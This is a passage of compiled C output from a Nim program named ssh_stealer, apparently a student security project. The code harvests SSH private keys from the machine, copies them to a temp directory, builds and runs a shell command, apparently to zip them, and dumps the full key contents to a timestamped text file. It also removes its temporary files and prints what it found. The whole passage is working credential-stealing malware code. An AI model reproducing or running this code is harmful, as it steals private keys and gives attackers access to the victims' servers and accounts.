	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	colontmpD__2 = dollar___systemZdollars_u14(T8_);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T7_ = rawNewString(colontmpD_.len + colontmpD__2.len + 9);
appendString((&T7_), colontmpD_);
appendString((&T7_), TM__2xpQS59aSyPswVY8RfkDWhg_55);
appendString((&T7_), colontmpD__2);
	tempDir_1 = T7_;
	nimln_(52);	noscreateDir(tempDir_1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	{
		NimStringV2* key_1;
		NI i_1;
		NI L_1;
		NI T10_;
		key_1 = (NimStringV2*)0;
		nimlf_(249, "/usr/lib/nim/lib/system/iterators.nim");		i_1 = ((NI)0);
		nimln_(250);		T10_ = keys_1.len;
		L_1 = T10_;
		{
			nimln_(251);			while (1) {
				NimStringV2 dest_1;
				NimStringV2 colontmpD__4;
				if (!(i_1 < L_1)) goto LA12;
				dest_1.len = 0; dest_1.p = NIM_NIL;
				colontmpD__4.len = 0; colontmpD__4.p = NIM_NIL;
				nimlf_(55, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");				if (i_1 < 0 || i_1 >= keys_1.len){ raiseIndexError2(i_1,keys_1.len-1); goto LA13_;
				}
				key_1 = (&keys_1.p->data[i_1]);
				nimln_(56);				colontmpD__4 = nosextractFilename((*key_1));
				if (NIM_UNLIKELY(*nimErr_)) goto LA13_;
				dest_1 = slash___stdZprivateZospaths2_u88(tempDir_1, colontmpD__4);
				if (NIM_UNLIKELY(*nimErr_)) goto LA13_;
				nimln_(57);				noscopyFile((*key_1), dest_1, 2, ((NI)16384));
				if (NIM_UNLIKELY(*nimErr_)) goto LA13_;
				nimlf_(13, "/usr/lib/nim/lib/system/iterators.nim");				i_1 += ((NI)1);
				nimln_(254);				{
					NI T16_;
					T16_ = keys_1.len;
					if (!!((T16_ == L_1))) goto LA17_;
					failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_56);
					if (NIM_UNLIKELY(*nimErr_)) goto LA13_;
				}
LA17_: ;
				{
					LA13_:;
				}
				{
					nimlf_(394, "/usr/lib/nim/lib/system.nim");					if (colontmpD__4.p && !(colontmpD__4.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__4.p);
}
					if (dest_1.p && !(dest_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(dest_1.p);
}
				}
				if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
			} LA12: ;
		}
	}
	nimlf_(60, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	T21_.len = 0; T21_.p = NIM_NIL;
	colontmpD__3 = nosgetTempDir();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T21_ = rawNewString(colontmpD__3.len + 12);
appendString((&T21_), colontmpD__3);
appendString((&T21_), TM__2xpQS59aSyPswVY8RfkDWhg_58);
	zipFile_1 = T21_;
	nimln_(61);	T22_.len = 0; T22_.p = NIM_NIL;
	T22_ = rawNewString(tempDir_1.len + zipFile_1.len + 70);
appendString((&T22_), TM__2xpQS59aSyPswVY8RfkDWhg_60);
appendString((&T22_), tempDir_1);
appendString((&T22_), TM__2xpQS59aSyPswVY8RfkDWhg_62);
appendString((&T22_), zipFile_1);
appendString((&T22_), TM__2xpQS59aSyPswVY8RfkDWhg_64);
	cmd_1 = T22_;
	nimln_(62);	T23_ = (NI)0;
	T23_ = nosexecShellCmd(cmd_1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	(void)(T23_);
	nimln_(65);	result_2 = TM__2xpQS59aSyPswVY8RfkDWhg_65;
	nimln_(66);	{
		NIM_BOOL T26_;
		NimStringV2 T29_;
		T26_ = (NIM_BOOL)0;
		T26_ = nosfileExists(zipFile_1);
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
		if (!T26_) goto LA27_;
		nimlf_(1694, "/usr/lib/nim/lib/system.nim");		nimlf_(67, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		T29_.len = 0; T29_.p = NIM_NIL;
		T29_ = readFile__stdZsyncio_u529(zipFile_1);
		if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u281(T29_); goto LA1_;}
		nimlf_(1694, "/usr/lib/nim/lib/system.nim");		eqsink___system_u2714((&result_2), T29_);
	}
LA27_: ;
	nimlf_(70, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	nosremoveDir(tempDir_1, NIM_FALSE);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(71);	nosremoveFile(zipFile_1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(73);	nimln_(44);	nimln_(73);	result = result_2;
	nimlf_(1694, "/usr/lib/nim/lib/system.nim");	eqwasMoved___system_u2705((&result_2));
	nimln_(394);	if (result_2.p && !(result_2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(result_2.p);
}
	if (cmd_1.p && !(cmd_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(cmd_1.p);
}
	if (colontmpD__3.p && !(colontmpD__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__3.p);
}
	if (zipFile_1.p && !(zipFile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(zipFile_1.p);
}
	if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
	if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
	if (tempDir_1.p && !(tempDir_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(tempDir_1.p);
}
	nimln_(2123);	eqdestroy___system_u3869(keys_1);
	goto BeforeRet_;
	{
		LA1_:;
	}
	{
		nimln_(394);		if (result_2.p && !(result_2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(result_2.p);
}
		if (cmd_1.p && !(cmd_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(cmd_1.p);
}
		if (colontmpD__3.p && !(colontmpD__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__3.p);
}
		if (zipFile_1.p && !(zipFile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(zipFile_1.p);
}
		if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
		if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
		if (tempDir_1.p && !(tempDir_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(tempDir_1.p);
}
		nimln_(2123);		eqdestroy___system_u3869(keys_1);
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
	return result;
}
static N_INLINE(void, writeLine__ssh95stealer_u144)(FILE* f_p0, NimStringV2* x_p1, NI x_p1Len_0) {
NIM_BOOL* nimErr_;
	nimfr_("writeLine", "/usr/lib/nim/lib/std/syncio.nim");
{nimErr_ = nimErrorFlag();
	{
		NimStringV2* i_1;
		NI i_2;
		i_1 = (NimStringV2*)0;
		nimlf_(18, "/usr/lib/nim/lib/system/iterators.nim");		i_2 = ((NI)0);
		{
			nimln_(19);			while (1) {
				if (!(i_2 < x_p1Len_0)) goto LA3;
				nimlf_(622, "/usr/lib/nim/lib/std/syncio.nim");				if (i_2 < 0 || i_2 >= x_p1Len_0){ raiseIndexError2(i_2,x_p1Len_0-1); goto BeforeRet_;
				}
				i_1 = (&x_p1[i_2]);
				nimln_(623);				write__stdZsyncio_u254(f_p0, (*i_1));
				if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
				nimlf_(13, "/usr/lib/nim/lib/system/iterators.nim");				i_2 += ((NI)1);
			} LA3: ;
		}
	}
	nimlf_(624, "/usr/lib/nim/lib/std/syncio.nim");	write__stdZsyncio_u254(f_p0, TM__2xpQS59aSyPswVY8RfkDWhg_79);
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
}
static N_INLINE(void, popCurrentException)(void) {
	eqcopy___stdZtypedthreads_u223(&currException__system_u4154, (*currException__system_u4154).up, NIM_FALSE);
}
N_LIB_PRIVATE N_NIMCALL(NimStringV2, saveSSHKeys__ssh95stealer_u129)(void) {
	NimStringV2 result;
	tySequence__sM4lkSb7zS6F7OVMvW9cffQ keys_1;
	NimStringV2 outputFile_1;
	NimStringV2 colontmpD_;
	NimStringV2 colontmpD__2;
	tyObject_TimezonecolonObjectType___DA7QPQgnivWR9cVVp7gTo0A* colontmpD__3;
	NimStringV2 colontmpD__4;
	NimStringV2 colontmpD__5;
	NimStringV2 colontmpD__6;
	NimStringV2 T7_;
	NI T8_;
	FILE* f_1;
	tyArray__nHXaesL0DJZHyVS07ARPRA T9_;
	NimStringV2 T10_;
	tyObject_Time__VlA5C5c2557zvTIF6i5qqA T11_;
	tyArray__nHXaesL0DJZHyVS07ARPRA T12_;
NIM_BOOL* nimErr_;
	nimfr_("saveSSHKeys", "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");
{nimErr_ = nimErrorFlag();
	result.len = 0; result.p = NIM_NIL;
	keys_1.len = 0; keys_1.p = NIM_NIL;
	outputFile_1.len = 0; outputFile_1.p = NIM_NIL;
	colontmpD_.len = 0; colontmpD_.p = NIM_NIL;
	colontmpD__2.len = 0; colontmpD__2.p = NIM_NIL;
	colontmpD__3 = NIM_NIL;
	colontmpD__4.len = 0; colontmpD__4.p = NIM_NIL;
	colontmpD__5.len = 0; colontmpD__5.p = NIM_NIL;
	colontmpD__6.len = 0; colontmpD__6.p = NIM_NIL;
	nimlf_(105, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	keys_1 = extractSSHKeys__ssh95stealer_u4();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(107);	{
		NI T4_;
		T4_ = keys_1.len;
		if (!(T4_ == ((NI)0))) goto LA5_;
		nimln_(108);		nimln_(103);		nimln_(108);		result = TM__2xpQS59aSyPswVY8RfkDWhg_74;
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmpD__6.p && !(colontmpD__6.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__6.p);
}
		if (colontmpD__5.p && !(colontmpD__5.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__5.p);
}
		if (colontmpD__4.p && !(colontmpD__4.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__4.p);
}
		nimlf_(1118, "/usr/lib/nim/lib/pure/times.nim");		eqdestroy___pureZtimes_u1556(colontmpD__3);
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
		if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
		if (outputFile_1.p && !(outputFile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(outputFile_1.p);
}
		nimln_(2123);		eqdestroy___system_u3869(keys_1);
		goto BeforeRet_;
	}
LA5_: ;
	nimlf_(110, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	T7_.len = 0; T7_.p = NIM_NIL;
	colontmpD_ = nosgetTempDir();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T8_ = (NI)0;
	T8_ = getCurrentProcessId__pureZos_u445();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	colontmpD__2 = dollar___systemZdollars_u14(T8_);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T7_ = rawNewString(colontmpD_.len + colontmpD__2.len + 13);
appendString((&T7_), colontmpD_);
appendString((&T7_), TM__2xpQS59aSyPswVY8RfkDWhg_75);
appendString((&T7_), colontmpD__2);
appendString((&T7_), TM__2xpQS59aSyPswVY8RfkDWhg_77);
	outputFile_1 = T7_;
	nimln_(111);	f_1 = open__stdZsyncio_u487(outputFile_1, ((tyEnum_FileMode__BzUbNzIgtuxKp78IxN69cmQ)1), ((NI)-1));
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(112);	T10_.len = 0; T10_.p = NIM_NIL;
	T11_ = getTime__pureZtimes_u1268();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimlf_(2239, "/usr/lib/nim/lib/pure/times.nim");	colontmpD__3 = local__pureZtimes_u2057();
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimlf_(112, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	colontmpD__4 = format__ssh95stealer_u137(T11_, colontmpD__3);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T10_ = rawNewString(colontmpD__4.len + 21);
appendString((&T10_), TM__2xpQS59aSyPswVY8RfkDWhg_81);
appendString((&T10_), colontmpD__4);
	colontmpD__5 = T10_;
	T9_[0] = colontmpD__5;
	writeLine__ssh95stealer_u144(f_1, T9_, 1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(113);	colontmpD__6 = nsuRepeatStr(TM__2xpQS59aSyPswVY8RfkDWhg_82, ((NI)80));
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T12_[0] = colontmpD__6;
	writeLine__ssh95stealer_u144(f_1, T12_, 1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(114);	writeLine__ssh95stealer_u144(f_1, TM__2xpQS59aSyPswVY8RfkDWhg_83, 1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	{
		NimStringV2* key_1;
		NI i_1;
		NI L_1;
		NI T14_;
		key_1 = (NimStringV2*)0;
		nimlf_(249, "/usr/lib/nim/lib/system/iterators.nim");		i_1 = ((NI)0);
		nimln_(250);		T14_ = keys_1.len;
		L_1 = T14_;
		{
			nimln_(251);			while (1) {
				NimStringV2 colontmpD__7;
				NimStringV2 colontmpD__8;
				tyArray__nHXaesL0DJZHyVS07ARPRA T18_;
				NimStringV2 T19_;
				NimStringV2 content_1;
				NimStringV2 T22_;
				tyArray__nHXaesL0DJZHyVS07ARPRA T23_;
				tyArray__nHXaesL0DJZHyVS07ARPRA T29_;
				NimStringV2 T30_;
				if (!(i_1 < L_1)) goto LA16;
				colontmpD__7.len = 0; colontmpD__7.p = NIM_NIL;
				colontmpD__8.len = 0; colontmpD__8.p = NIM_NIL;
				nimlf_(116, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");				if (i_1 < 0 || i_1 >= keys_1.len){ raiseIndexError2(i_1,keys_1.len-1); goto LA17_;
				}
				key_1 = (&keys_1.p->data[i_1]);
				nimln_(117);				T19_.len = 0; T19_.p = NIM_NIL;
				T19_ = rawNewString((*key_1).len + 6);
appendString((&T19_), TM__2xpQS59aSyPswVY8RfkDWhg_85);
appendString((&T19_), (*key_1));
				colontmpD__7 = T19_;
				T18_[0] = colontmpD__7;
				writeLine__ssh95stealer_u144(f_1, T18_, 1);
				if (NIM_UNLIKELY(*nimErr_)) goto LA17_;
				content_1.len = 0; content_1.p = NIM_NIL;
				nimln_(119);				T22_.len = 0; T22_.p = NIM_NIL;
				T22_ = readFile__stdZsyncio_u529((*key_1));
				if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u281(T22_); goto LA21_;}
				content_1 = T22_;
				nimln_(120);				writeLine__ssh95stealer_u144(f_1, TM__2xpQS59aSyPswVY8RfkDWhg_86, 1);
				if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
				nimln_(121);				T23_[0] = content_1;
				writeLine__ssh95stealer_u144(f_1, T23_, 1);
				if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
				{
					LA21_:;
				}
				{
					nimlf_(394, "/usr/lib/nim/lib/system.nim");					if (content_1.p && !(content_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(content_1.p);
}
				}
				if (NIM_UNLIKELY(*nimErr_)) goto LA20_;
				if (NIM_UNLIKELY(*nimErr_)) {
					LA20_:;
					{
						*nimErr_ = NIM_FALSE;
						nimlf_(123, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");						raiseDefect();
						writeLine__ssh95stealer_u144(f_1, TM__2xpQS59aSyPswVY8RfkDWhg_88, 1);
						if (NIM_UNLIKELY(*nimErr_)) goto LA27_;
						popCurrentException();
						LA27_:;
					}
				}
				if (NIM_UNLIKELY(*nimErr_)) goto LA17_;
				nimln_(124);				T30_.len = 0; T30_.p = NIM_NIL;
				T30_ = nsuRepeatStr(TM__2xpQS59aSyPswVY8RfkDWhg_91, ((NI)40));
				if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u281(T30_); goto LA17_;}
				colontmpD__8 = T30_;
				T29_[0] = colontmpD__8;
				writeLine__ssh95stealer_u144(f_1, T29_, 1);
				if (NIM_UNLIKELY(*nimErr_)) goto LA17_;
				nimlf_(13, "/usr/lib/nim/lib/system/iterators.nim");				i_1 += ((NI)1);
				nimln_(254);				{
					NI T33_;
					T33_ = keys_1.len;
					if (!!((T33_ == L_1))) goto LA34_;
					failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_92);
					if (NIM_UNLIKELY(*nimErr_)) goto LA17_;
				}
LA34_: ;
				{
					LA17_:;
				}
				{
					nimlf_(394, "/usr/lib/nim/lib/system.nim");					if (colontmpD__8.p && !(colontmpD__8.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__8.p);
}
					if (colontmpD__7.p && !(colontmpD__7.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__7.p);
}
				}
				if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
			} LA16: ;
		}
	}
	nimlf_(126, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	close__stdZsyncio_u268(f_1);
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	nimln_(127);	result = outputFile_1;
	nimlf_(1694, "/usr/lib/nim/lib/system.nim");	eqwasMoved___system_u2705((&outputFile_1));
	{
		LA1_:;
	}
	{
		nimln_(394);		if (colontmpD__6.p && !(colontmpD__6.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__6.p);
}
		if (colontmpD__5.p && !(colontmpD__5.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__5.p);
}
		if (colontmpD__4.p && !(colontmpD__4.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__4.p);
}
		nimlf_(1118, "/usr/lib/nim/lib/pure/times.nim");		eqdestroy___pureZtimes_u1556(colontmpD__3);
		nimlf_(394, "/usr/lib/nim/lib/system.nim");		if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
		if (colontmpD_.p && !(colontmpD_.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD_.p);
}
		if (outputFile_1.p && !(outputFile_1.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(outputFile_1.p);
}
		nimln_(2123);		eqdestroy___system_u3869(keys_1);
	}
	if (NIM_UNLIKELY(*nimErr_)) goto BeforeRet_;
	}BeforeRet_: ;
	popFrame();
	return result;
}

N_LIB_PRIVATE void PreMainInner(void) {
}

N_LIB_PRIVATE int cmdCount;
N_LIB_PRIVATE char** cmdLine;
N_LIB_PRIVATE char** gEnv;
N_LIB_PRIVATE void PreMain(void) {
#if 0
	void (*volatile inner)(void);
	inner = PreMainInner;
	atmdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsusratslibatsnimatslibatssystemdotnim_Init000();
	(*inner)();
#else
	atmdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsdotdotatsusratslibatsnimatslibatssystemdotnim_Init000();
	PreMainInner();
#endif
}

N_LIB_PRIVATE N_CDECL(void, NimMainInner)(void) {
	NimMainModule();
}

N_CDECL(void, NimMain)(void) {
#if 0
	void (*volatile inner)(void);
	PreMain();
	inner = NimMainInner;
	(*inner)();
#else
	PreMain();
	NimMainInner();
#endif
}

int main(int argc, char** args, char** env) {
	cmdLine = args;
	cmdCount = argc;
	gEnv = env;
	NimMain();
	return nim_program_result;
}

N_LIB_PRIVATE N_NIMCALL(void, NimMainModule)(void) {
{
	NimStringV2 colontmpD_;
	tyArray__nHXaesL0DJZHyVS07ARPRA T2_;
	tySequence__sM4lkSb7zS6F7OVMvW9cffQ T3_;
NIM_BOOL* nimErr_;
	nimfr_("ssh_stealer", "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");
nimErr_ = nimErrorFlag();
	colontmpD_.len = 0; colontmpD_.p = NIM_NIL;
	nimlf_(130, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");	echoBinSafe(TM__2xpQS59aSyPswVY8RfkDWhg_2, 1);
	nimln_(131);	colontmpD_ = nsuRepeatStr(TM__2xpQS59aSyPswVY8RfkDWhg_5, ((NI)50));
	if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	T2_[0] = colontmpD_;
	echoBinSafe(T2_, 1);
	nimln_(133);	T3_.len = 0; T3_.p = NIM_NIL;
	T3_ = extractSSHKeys__ssh95stealer_u4();
	if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u3869(T3_); goto LA1_;}
	keys__ssh95stealer_u185 = T3_;
	nimln_(135);	{
		NI T6_;
		NimStringV2 colontmpD__2;
		NimStringV2 colontmpD__3;
		tyArray__Re75IspeoxXy2oCZHwcRrA T10_;
		T6_ = keys__ssh95stealer_u185.len;
		if (!(T6_ == ((NI)0))) goto LA7_;
		colontmpD__2.len = 0; colontmpD__2.p = NIM_NIL;
		colontmpD__3.len = 0; colontmpD__3.p = NIM_NIL;
		nimln_(136);		echoBinSafe(TM__2xpQS59aSyPswVY8RfkDWhg_33, 1);
		nimln_(137);		T10_[0] = TM__2xpQS59aSyPswVY8RfkDWhg_36;
		colontmpD__2 = getEnv__stdZenvvars_u15(TM__2xpQS59aSyPswVY8RfkDWhg_37, TM__2xpQS59aSyPswVY8RfkDWhg_38);
		if (NIM_UNLIKELY(*nimErr_)) goto LA9_;
		colontmpD__3 = slash___stdZprivateZospaths2_u88(colontmpD__2, TM__2xpQS59aSyPswVY8RfkDWhg_39);
		if (NIM_UNLIKELY(*nimErr_)) goto LA9_;
		T10_[1] = colontmpD__3;
		echoBinSafe(T10_, 2);
		{
			LA9_:;
		}
		{
			nimlf_(394, "/usr/lib/nim/lib/system.nim");			if (colontmpD__3.p && !(colontmpD__3.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__3.p);
}
			if (colontmpD__2.p && !(colontmpD__2.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__2.p);
}
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	}
	goto LA4_;
LA7_: ;
	{
		NimStringV2 colontmpD__4;
		tyArray__24KAM9afIUgUaqBaEBB6r9bg T15_;
		NI T16_;
		NimStringV2 T31_;
		NimStringV2 T40_;
		colontmpD__4.len = 0; colontmpD__4.p = NIM_NIL;
		nimlf_(139, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		T15_[0] = TM__2xpQS59aSyPswVY8RfkDWhg_41;
		T16_ = keys__ssh95stealer_u185.len;
		colontmpD__4 = dollar___systemZdollars_u14(T16_);
		if (NIM_UNLIKELY(*nimErr_)) goto LA14_;
		T15_[1] = colontmpD__4;
		T15_[2] = TM__2xpQS59aSyPswVY8RfkDWhg_43;
		echoBinSafe(T15_, 3);
		{
			NI i_1;
			NI L_1;
			NI T18_;
			nimlf_(249, "/usr/lib/nim/lib/system/iterators.nim");			i_1 = ((NI)0);
			nimln_(250);			T18_ = keys__ssh95stealer_u185.len;
			L_1 = T18_;
			{
				nimln_(251);				while (1) {
					NimStringV2 colontmpD__5;
					NimStringV2 colontmpD__6;
					NI64 T22_;
					tyArray__haiLFy0nBviVTKFGuwztzQ T23_;
					if (!(i_1 < L_1)) goto LA20;
					colontmpD__5.len = 0; colontmpD__5.p = NIM_NIL;
					colontmpD__6.len = 0; colontmpD__6.p = NIM_NIL;
					nimlf_(141, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");					if (i_1 < 0 || i_1 >= keys__ssh95stealer_u185.len){ raiseIndexError2(i_1,keys__ssh95stealer_u185.len-1); goto LA21_;
					}
					key__ssh95stealer_u195 = (&keys__ssh95stealer_u185.p->data[i_1]);
					size__ssh95stealer_u196 = 0;
					nimln_(142);					T22_ = (NI64)0;
					T22_ = nosgetFileSize((*key__ssh95stealer_u195));
					if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
					size__ssh95stealer_u196 = T22_;
					nimln_(143);					T23_[0] = TM__2xpQS59aSyPswVY8RfkDWhg_45;
					colontmpD__5 = nosextractFilename((*key__ssh95stealer_u195));
					if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
					T23_[1] = colontmpD__5;
					T23_[2] = TM__2xpQS59aSyPswVY8RfkDWhg_47;
					colontmpD__6 = dollar___systemZdollars_u34(size__ssh95stealer_u196);
					if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
					T23_[3] = colontmpD__6;
					T23_[4] = TM__2xpQS59aSyPswVY8RfkDWhg_49;
					echoBinSafe(T23_, 5);
					nimlf_(13, "/usr/lib/nim/lib/system/iterators.nim");					i_1 += ((NI)1);
					nimln_(254);					{
						NI T26_;
						T26_ = keys__ssh95stealer_u185.len;
						if (!!((T26_ == L_1))) goto LA27_;
						failedAssertImpl__stdZassertions_u234(TM__2xpQS59aSyPswVY8RfkDWhg_51);
						if (NIM_UNLIKELY(*nimErr_)) goto LA21_;
					}
LA27_: ;
					{
						LA21_:;
					}
					{
						nimlf_(394, "/usr/lib/nim/lib/system.nim");						if (colontmpD__6.p && !(colontmpD__6.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__6.p);
}
						if (colontmpD__5.p && !(colontmpD__5.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__5.p);
}
					}
					if (NIM_UNLIKELY(*nimErr_)) goto LA14_;
				} LA20: ;
			}
		}
		nimlf_(146, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		T31_.len = 0; T31_.p = NIM_NIL;
		T31_ = packSSHKeys__ssh95stealer_u71();
		if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u281(T31_); goto LA14_;}
		zipData__ssh95stealer_u197 = T31_;
		nimln_(147);		{
			NimStringV2 colontmpD__7;
			tyArray__24KAM9afIUgUaqBaEBB6r9bg T37_;
			if (!!((zipData__ssh95stealer_u197.len == 0))) goto LA34_;
			colontmpD__7.len = 0; colontmpD__7.p = NIM_NIL;
			nimln_(148);			T37_[0] = TM__2xpQS59aSyPswVY8RfkDWhg_67;
			colontmpD__7 = dollar___systemZdollars_u14(zipData__ssh95stealer_u197.len);
			if (NIM_UNLIKELY(*nimErr_)) goto LA36_;
			T37_[1] = colontmpD__7;
			T37_[2] = TM__2xpQS59aSyPswVY8RfkDWhg_69;
			echoBinSafe(T37_, 3);
			nimln_(151);			writeFile__stdZsyncio_u534(TM__2xpQS59aSyPswVY8RfkDWhg_71, zipData__ssh95stealer_u197);
			if (NIM_UNLIKELY(*nimErr_)) goto LA36_;
			nimln_(152);			echoBinSafe(TM__2xpQS59aSyPswVY8RfkDWhg_72, 1);
			{
				LA36_:;
			}
			{
				nimlf_(394, "/usr/lib/nim/lib/system.nim");				if (colontmpD__7.p && !(colontmpD__7.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__7.p);
}
			}
			if (NIM_UNLIKELY(*nimErr_)) goto LA14_;
		}
LA34_: ;
		nimlf_(155, "/home/luminary/Documents/Cybersecurite/Oteria/Venom/ssh_stealer/ssh_stealer.nim");		T40_.len = 0; T40_.p = NIM_NIL;
		T40_ = saveSSHKeys__ssh95stealer_u129();
		if (NIM_UNLIKELY(*nimErr_)) {eqdestroy___system_u281(T40_); goto LA14_;}
		txtFile__ssh95stealer_u198 = T40_;
		nimln_(156);		{
			tyArray__Re75IspeoxXy2oCZHwcRrA T45_;
			if (!!((txtFile__ssh95stealer_u198.len == 0))) goto LA43_;
			nimln_(157);			T45_[0] = TM__2xpQS59aSyPswVY8RfkDWhg_94;
			T45_[1] = txtFile__ssh95stealer_u198;
			echoBinSafe(T45_, 2);
		}
LA43_: ;
		{
			LA14_:;
		}
		{
			nimlf_(394, "/usr/lib/nim/lib/system.nim");			if (txtFile__ssh95stealer_u198.p && !(txtFile__ssh95stealer_u198.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(txtFile__ssh95stealer_u198.p);
}
			if (zipData__ssh95stealer_u197.p && !(zipData__ssh95stealer_u197.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(zipData__ssh95stealer_u197.p);
}
			if (colontmpD__4.p && !(colontmpD__4.p->cap & NIM_STRLIT_FLAG)) {
 deallocShared(colontmpD__4.p);
}
		}
		if (NIM_UNLIKELY(*nimErr_)) goto LA1_;
	}
LA4_: ;
	{
		LA1_:;
